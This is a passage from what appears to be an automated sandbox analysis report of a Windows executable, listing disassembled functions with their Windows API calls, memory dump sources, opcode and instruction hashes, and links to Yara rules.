              • Opcode Fuzzy Hash: bb753df18b2f9428252ae2b71119b3c9a6fb799621b9046dfe7244565025d44d
              • Instruction Fuzzy Hash: 24F05E3A200200BBCF516F55ED85A8ABB2AEF55320F088061FE085E22BC731E911CBB4
              Function 0020C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018135C
                • Part of subcall function 001812F3: BeginPath.GDI32(?), ref: 00181373
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018139C
              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0020C030
              • LineTo.GDI32(00000000,?,?), ref: 0020C03D
              • EndPath.GDI32(00000000), ref: 0020C04D
              • StrokePath.GDI32(00000000), ref: 0020C05B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
              • String ID:
              • API String ID: 1539411459-0
              • Opcode ID: a9248183a75c8d07bbad336a708cbf6313d794153925a6e9d5ed04fe5d9f11cc
              • Instruction ID: 396699464a1a06a56e95f4989df40f3221ac3db01169503d3f412f77337c309e
              • Opcode Fuzzy Hash: a9248183a75c8d07bbad336a708cbf6313d794153925a6e9d5ed04fe5d9f11cc
              • Instruction Fuzzy Hash: 84F09A32040319BADB226F50BC0DFCA3B5AAF16710F148100FA11214E287A50665CB95
              Function 001DA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
              Download Yara Rule
              APIs
              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001DA399
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001DA3AC
              • GetCurrentThreadId.KERNEL32 ref: 001DA3B3
              • AttachThreadInput.USER32(00000000), ref: 001DA3BA
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
              • String ID:
              • API String ID: 2710830443-0
              • Opcode ID: 8a1e4b0f97c9203f3b95c95409a6b5179067cecb82b1f85716490dfc842f13ac
              • Instruction ID: 5042d9aadab8e8bd1675af4ab960a8ad15eeb3a1ed8fe3956bf65dfffc9143c5
              • Opcode Fuzzy Hash: 8a1e4b0f97c9203f3b95c95409a6b5179067cecb82b1f85716490dfc842f13ac
              • Instruction Fuzzy Hash: 78E03931581328BADB209FA2ED0CED77F1CFF167A1F408025F50884461CB72C540CBA0
              Function 00182218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
              Download Yara Rule
              APIs
              • GetSysColor.USER32(00000008), ref: 00182231
              • SetTextColor.GDI32(?,000000FF), ref: 0018223B
              • SetBkMode.GDI32(?,00000001), ref: 00182250
              • GetStockObject.GDI32(00000005), ref: 00182258
              • GetWindowDC.USER32(?,00000000), ref: 001BC0D3
              • GetPixel.GDI32(00000000,00000000,00000000), ref: 001BC0E0
              • GetPixel.GDI32(00000000,?,00000000), ref: 001BC0F9
              • GetPixel.GDI32(00000000,00000000,?), ref: 001BC112
              • GetPixel.GDI32(00000000,?,?), ref: 001BC132
              • ReleaseDC.USER32(?,00000000), ref: 001BC13D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
              • String ID:
              • API String ID: 1946975507-0
              • Opcode ID: 3acb961253e8afe7a029dd2620eb00cbd1f7a52509471709a021b55f9912858f
              • Instruction ID: 8ed2016f05202f047a119bccdf42045eaef71b0d1e1fee415add6ebba3df680c
              • Opcode Fuzzy Hash: 3acb961253e8afe7a029dd2620eb00cbd1f7a52509471709a021b55f9912858f
              • Instruction Fuzzy Hash: 48E06D32140244EADFB15F68FD0D7D87B10EB15332F048366FA6D580E287B14990DF51
              Function 001D8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
              Download Yara Rule
              APIs
              • GetCurrentThread.KERNEL32 ref: 001D8C63
              • OpenThreadToken.ADVAPI32(00000000,?,?,?,001D882E), ref: 001D8C6A
              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001D882E), ref: 001D8C77
              • OpenProcessToken.ADVAPI32(00000000,?,?,?,001D882E), ref: 001D8C7E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CurrentOpenProcessThreadToken
              • String ID:
              • API String ID: 3974789173-0
              • Opcode ID: 6b4f4a5fa2187ea36173c5ea9d02139b1b06084c48c47701903691e1dbf8c5ac
              • Instruction ID: 860cc4eb02a62944bf3887a903e47b2f8ee2904974d0a0d7f3f97c5dce773448
              • Opcode Fuzzy Hash: 6b4f4a5fa2187ea36173c5ea9d02139b1b06084c48c47701903691e1dbf8c5ac
              • Instruction Fuzzy Hash: E0E08636696311DBD7705FB07E0CB963BBCEF507A2F044828B645C9041DB348441CB71
              Function 001C2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
              Download Yara Rule
              APIs
              • GetDesktopWindow.USER32 ref: 001C2187
              • GetDC.USER32(00000000), ref: 001C2191
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001C21B1
              • ReleaseDC.USER32(?), ref: 001C21D2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 3f3a239195c6e8f7a592d68799f92c82a708cc0495a67bfe7d9e7eb4034c0fbe
              • Instruction ID: dc2e2f069c4a938f73fb6abf2cee8612455e67674ab0c4c19956565bff7e2e51
              • Opcode Fuzzy Hash: 3f3a239195c6e8f7a592d68799f92c82a708cc0495a67bfe7d9e7eb4034c0fbe
              • Instruction Fuzzy Hash: 44E09A75840704EFCB90AFA0E90CBAD7BF5EB1C310F118029F82A93221CB3981419F40
              Function 001C219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • GetDesktopWindow.USER32 ref: 001C219B
              • GetDC.USER32(00000000), ref: 001C21A5
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001C21B1
              • ReleaseDC.USER32(?), ref: 001C21D2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 01925dacbd8f9ab174326a305f13a48c78e3a5a19cf3ffb5e1e3898298261e01
              • Instruction ID: 011943e2c01d3a7c65f69758568c48e1264d068745b55fbf7897e38869f034f5
              • Opcode Fuzzy Hash: 01925dacbd8f9ab174326a305f13a48c78e3a5a19cf3ffb5e1e3898298261e01
              • Instruction Fuzzy Hash: D9E01A75840704AFCBA1AFB0E90C69D7BF5EB5C310F118025F96A97621CB3991419F40
              Function 001863A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: %!
              • API String ID: 0-1084970021
              • Opcode ID: 7086714e48f126bbdf31e6653989306f4abed080f1b37056dc8c14b8eef3c958
              • Instruction ID: 235e8ca6ba1efd15f2bc35e31b354d80062c44a9964b3ed15c0b6cc83ab331e2
              • Opcode Fuzzy Hash: 7086714e48f126bbdf31e6653989306f4abed080f1b37056dc8c14b8eef3c958
              • Instruction Fuzzy Hash: C1B18B719002099BCF24FF98C8959FEBBB5EF54350F644026E906A7295EB349F82CF91
              Function 001FB1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __itow_s
              • String ID: xr$$xr$
              • API String ID: 3653519197-1694013976
              • Opcode ID: 77303ed4e6ff02f4bfd7655b3dbae21cc15ea0403fa498038e952b04ea433cc4
              • Instruction ID: 1dd7b791299597d4635179e2c75fdd0bd53b7b26796cde5f4c4bee9d706e6403
              • Opcode Fuzzy Hash: 77303ed4e6ff02f4bfd7655b3dbae21cc15ea0403fa498038e952b04ea433cc4
              • Instruction Fuzzy Hash: 29B18174A04209AFCB14EF54C8D0EBEB7B9FF58300F148459FA469B292DB74EA41CB60
              Function 001EB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • __wcsnicmp.LIBCMT ref: 001EB298
              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 001EB361
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
              • String ID: LPT
              • API String ID: 3222508074-1350329615
              • Opcode ID: e207625b98a3bf0aea0f4854f25268072e823b4d561078f547aa0717b1352796
              • Instruction ID: 7f4fab45cbef004c8e4e2e1e4f6bd344f74e3586d08882b81d7e774495741b2b
              • Opcode Fuzzy Hash: e207625b98a3bf0aea0f4854f25268072e823b4d561078f547aa0717b1352796
              • Instruction Fuzzy Hash: 0D617175E04615AFCB18EF95C886EAEB7B4BF18310F15406AF546AB291DB70AE40CB50
              Function 00192AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNEL32(00000000), ref: 00192AC8
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00192AE1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: GlobalMemorySleepStatus
              • String ID: @
              • API String ID: 2783356886-2766056989
              • Opcode ID: 071776587439965cc8fd166317c98fac2c086258072f948ae7c9234c54f5291c
              • Instruction ID: c1013657782e4c29ac81acd2006b1835e448737d1284f034fc6ffcc2062508dc
              • Opcode Fuzzy Hash: 071776587439965cc8fd166317c98fac2c086258072f948ae7c9234c54f5291c
              • Instruction Fuzzy Hash: A7515671418744ABD320BF50D88ABAFBBE8FF94314F56885DF1DA410A1DB308629CB26
              Function 001E99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0018506B: __fread_nolock.LIBCMT ref: 00185089
              • _wcscmp.LIBCMT ref: 001E9AAE
              • _wcscmp.LIBCMT ref: 001E9AC1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscmp$__fread_nolock
              • String ID: FILE
              • API String ID: 4029003684-3121273764
              • Opcode ID: 64395c6e4294a533bb238c70d31c9b7f0a1dd2bedb8c3bb27e0b2a8a7ac0e05e
              • Instruction ID: fa05ad8d84f4bd02b1dbc0761356ceffc3620acf68e21d1f5dd8db93fad16187
              • Opcode Fuzzy Hash: 64395c6e4294a533bb238c70d31c9b7f0a1dd2bedb8c3bb27e0b2a8a7ac0e05e
              • Instruction Fuzzy Hash: 8941E971A00649BADF20AAA5DC45FEFBBFDDF55714F000079F900E7181D7759A048BA1
              Function 001C099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClearVariant
              • String ID: Dt$$Dt$
              • API String ID: 1473721057-2789805393
              • Opcode ID: 71ff0daf9f6f8def90709bacc58c0fd4a99746aea14821d2a4b43fbea6f57ab2
              • Instruction ID: e22eb589c3b2db2e3e7bf06c0d43b93fd3cd6eb36835f8c769d25db198cd4223
              • Opcode Fuzzy Hash: 71ff0daf9f6f8def90709bacc58c0fd4a99746aea14821d2a4b43fbea6f57ab2
              • Instruction Fuzzy Hash: F651D1786083418FE754DF18C484A2ABBF1BF99354F95485EE9858B321D331E981CF82
              Function 001F2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001F2892
              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001F28C8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CrackInternet_memset
              • String ID: |
              • API String ID: 1413715105-2343686810
              • Opcode ID: 629435f82f1d8a3cb9354bf9dfde9ebc1ff221ed127d2ba147e81d59afccde4c
              • Instruction ID: a1bd69c506ba46e1d4670cbe3d6a0be15b09d74ca19c005fdc11352d917afa3e
              • Opcode Fuzzy Hash: 629435f82f1d8a3cb9354bf9dfde9ebc1ff221ed127d2ba147e81d59afccde4c
              • Instruction Fuzzy Hash: DA310771800119AFCF01EFA1CC85EEEBBB9FF19300F104029F915A61A6DB719A56DFA0
              Function 00206CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(?,?,?,?), ref: 00206D86
              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00206DC2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$DestroyMove
              • String ID: static
              • API String ID: 2139405536-2160076837
              • Opcode ID: a4d6750ca99a8981e31162d3e3c2ce42aea24b18066a5149334fed9aae7e34e4
              • Instruction ID: 44823b6e782222b1b39740a065b8116ce5ed7929664637913212af00b1f2ab24
              • Opcode Fuzzy Hash: a4d6750ca99a8981e31162d3e3c2ce42aea24b18066a5149334fed9aae7e34e4
              • Instruction Fuzzy Hash: 6E31A171220305AEEB109F64CC84BFB73B9FF48724F108619F9A597191DB31AC61CB60
              Function 001E2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001E2E00
              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001E2E3B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoItemMenu_memset
              • String ID: 0
              • API String ID: 2223754486-4108050209
              • Opcode ID: 02c90d25ca232a94bff2786050c17d99907f98f1c94f690a4ee18b8d01a5e242
              • Instruction ID: 230d3052d4f3eda5a9783fad7290e467c1825469de4c3a7a67d6028fc4f2bc3b
              • Opcode Fuzzy Hash: 02c90d25ca232a94bff2786050c17d99907f98f1c94f690a4ee18b8d01a5e242
              • Instruction Fuzzy Hash: B7310631600755EBEB34CF4ADD45BAEBBBDFF05350F18006DE985961A0E7B09944CB50
              Function 00206943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002069D0
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002069DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: Combobox
              • API String ID: 3850602802-2096851135
              • Opcode ID: d361036ab19269d324ddadb3c501a3247bee9d8bc43b84a3cb8bc73a2b1b3fbf
              • Instruction ID: 766e6644bc28760bb649509b72de50caca95a3e2d9fba5eae29c6b91b6c3d94c
              • Opcode Fuzzy Hash: d361036ab19269d324ddadb3c501a3247bee9d8bc43b84a3cb8bc73a2b1b3fbf
              • Instruction Fuzzy Hash: DB11B67172030E6FEF119F14CC84EAB376EEB953A4F114124F958976D2D6719C718BA0
              Function 00206E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
                • Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
                • Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91
              • GetWindowRect.USER32(00000000,?), ref: 00206EE0
              • GetSysColor.USER32(00000012), ref: 00206EFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ColorCreateMessageObjectRectSendStock
              • String ID: static
              • API String ID: 1983116058-2160076837
              • Opcode ID: e24028958e95a97ac54d8352c68c12905e4786f782d633839129270d7028e6ee
              • Instruction ID: 334cdf917613c064fa5addd168501314c0d7b1428354a2aa66ea12ce4f1de26c
              • Opcode Fuzzy Hash: e24028958e95a97ac54d8352c68c12905e4786f782d633839129270d7028e6ee
              • Instruction Fuzzy Hash: 1621597262020AAFDB14DFA8DD49EEA7BB8FB09314F004628FD55D3291E734E8619B50
              Function 00206B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
              Download Yara Rule
              APIs
              • GetWindowTextLengthW.USER32(00000000), ref: 00206C11
              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00206C20
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
